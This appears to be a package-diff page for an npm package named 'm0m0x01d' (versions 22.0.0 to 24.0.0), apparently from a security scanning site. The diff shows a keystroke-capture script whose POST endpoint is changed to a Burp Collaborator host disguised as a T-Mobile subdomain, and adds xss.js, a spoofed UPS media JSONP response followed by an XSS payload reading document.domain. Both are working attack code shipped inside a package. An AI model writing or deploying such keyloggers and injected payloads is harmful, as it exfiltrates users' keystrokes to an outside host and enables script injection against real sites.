m0m0x01d 22.0.0 → 24.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/keystroke-capture.svg.js +1 -1
- package/package.json +1 -1
- package/xss.js +46 -0
package/keystroke-capture.svg.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
// Function to send keystrokes to the intermediary file on unpkg
|
2
2
|
function sendKeystrokes(data) {
|
3
3
|
var xhr = new XMLHttpRequest();
|
4
|
-
xhr.open("POST", "https://es.t-mobile.com
|
4
|
+
xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
|
5
5
|
xhr.setRequestHeader("Content-Type", "application/json");
|
6
6
|
xhr.send(JSON.stringify({ keystrokes: data }));
|
7
7
|
}
|
package/package.json
CHANGED
package/xss.js
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
/*jsonp*/
|
2
|
+
s7classics7sdkJSONResponse({
|
3
|
+
"set": {
|
4
|
+
"pv": "1.0",
|
5
|
+
"type": "video",
|
6
|
+
"n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
|
7
|
+
"item": {
|
8
|
+
"v": {
|
9
|
+
"path": "upsprod/_media_/e03/e035b19f-f70b-4213-9b2a-e49a8cfce5b4.mp4",
|
10
|
+
"dx": "1920",
|
11
|
+
"dy": "1080",
|
12
|
+
"bitrate": "60947580",
|
13
|
+
"id": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix",
|
14
|
+
"suffix": "mp4"
|
15
|
+
},
|
16
|
+
"i": {
|
17
|
+
"mod": "layer=0&src=is(upsprod/Coco vs. the Doubters_Coco with SMBs)",
|
18
|
+
"n": "upsprod/UPS_Coco_30s_16x9_v008_op001_Web_Mix"
|
19
|
+
},
|
20
|
+
"type": "video",
|
21
|
+
"iv": "zJZEa1",
|
22
|
+
"userdata": [{
|
23
|
+
"Audio_Codec": "AAC LC",
|
24
|
+
"Audio_Sample_Rate": "48.0",
|
25
|
+
"Number_Audio_Channels": "2",
|
26
|
+
"Video_Codec": "AVC",
|
27
|
+
"Video_Frame_Rate": "24.000",
|
28
|
+
"Video_Length": "30.0"
|
29
|
+
}, {
|
30
|
+
"Audio_Codec": "AAC LC",
|
31
|
+
"Audio_Sample_Rate": "48.0",
|
32
|
+
"Number_Audio_Channels": "2",
|
33
|
+
"Video_Codec": "AVC",
|
34
|
+
"Video_Frame_Rate": "24.000",
|
35
|
+
"Video_Length": "30.0"
|
36
|
+
}]
|
37
|
+
}
|
38
|
+
}
|
39
|
+
}, "130443601");
|
40
|
+
|
41
|
+
// XSS payload: inject document.domain into the JSONP response without breaking functionality
|
42
|
+
(function(){
|
43
|
+
var xss_payload = document.domain;
|
44
|
+
console.log("Injected XSS payload: " + xss_payload);
|
45
|
+
})();
|
46
|
+
|